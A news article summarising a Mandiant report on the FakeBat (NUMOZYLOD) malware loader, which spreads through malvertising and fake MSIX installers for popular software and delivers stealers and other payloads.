Technology

FakeBat Malware Exploits Software Searches

Lilu Anderson
By Lilu Anderson
FakeBat Malware Exploits Software Searches | FinOracle
Photo: Finoracle.net

Understanding the Rise of FakeBat Malware

Cybersecurity experts have recently uncovered a significant increase in malware infections linked to malvertising campaigns using a loader called FakeBat. These attacks are targeting individuals searching for popular business software, as highlighted in a report by the Mandiant Managed Defense team. The method involves a trojanized MSIX installer that executes a PowerShell script to download additional harmful software.

Contents
Understanding the Rise of FakeBat MalwareLinking FakeBat to EugenfestThe Mechanics of the AttackDeceptive Tactics and ExploitationThe Role of NUMOZYLODRecent Developments in Malware Activity

Linking FakeBat to Eugenfest

FakeBat is also recognized by other names, such as EugenLoader and PaykLoader, and has connections to a threat group known as Eugenfest. Google's threat intelligence team identifies this malware under the codename NUMOZYLOD, attributing the Malware-as-a-Service operation to UNC4536.

The Mechanics of the Attack

The attack strategy involves drive-by download techniques, which redirect users who search for popular software to fake websites offering malware-laden MSI installers. The malware families delivered through FakeBat include IcedID, RedLine Stealer, Lumma Stealer, SectopRAT (aka ArechClient2), and Carbanak, the latter being associated with the notorious FIN7 cybercrime group.

Deceptive Tactics and Exploitation

UNC4536's approach uses malvertising to spread trojanized MSIX installers that mimic well-known software like Brave, KeePass, Notion, Steam, and Zoom. These installers are housed on websites that pretend to be legitimate software sources, tricking users into downloading them. What makes these attacks stand out is the use of startScript configuration in MSIX installers to run a script before launching the main application.

The Role of NUMOZYLOD

Acting as a malware distributor, UNC4536 uses FakeBat to deploy additional malicious payloads for partners like FIN7. NUMOZYLOD plays a critical role by collecting system details, including operating system information, domain status, and installed antivirus products. It may also record the public IPv4 and IPv6 addresses of the host and transmit this data to its command-and-control (C2) servers. Furthermore, it establishes persistence by creating a shortcut (.lnk) in the StartUp folder.

Recent Developments in Malware Activity

This revelation follows Mandiant's earlier disclosure of another malware downloader called EMPTYSPACE (also known as BrokerLoader or Vetta Loader). This malware has been employed by a financially driven threat group, UNC4990, to carry out data theft and cryptojacking, specifically targeting sectors in Italy.

TAGGED:
Share This Article
Lilu Anderson
ByLilu Anderson
Lilu Anderson is a technology writer and analyst with over 12 years of experience in the tech industry. A graduate of Stanford University with a degree in Computer Science, Lilu specializes in emerging technologies, software development, and cybersecurity. Her work has been published in renowned tech publications such as Wired, TechCrunch, and Ars Technica. Lilu’s articles are known for their detailed research, clear articulation, and insightful analysis, making them valuable to readers seeking reliable and up-to-date information on technology trends. She actively stays abreast of the latest advancements and regularly participates in industry conferences and tech meetups. With a strong reputation for expertise, authoritativeness, and trustworthiness, Lilu Anderson continues to deliver high-quality content that helps readers understand and navigate the fast-paced world of technology.

Related Stories

Uncover the stories that related to the post!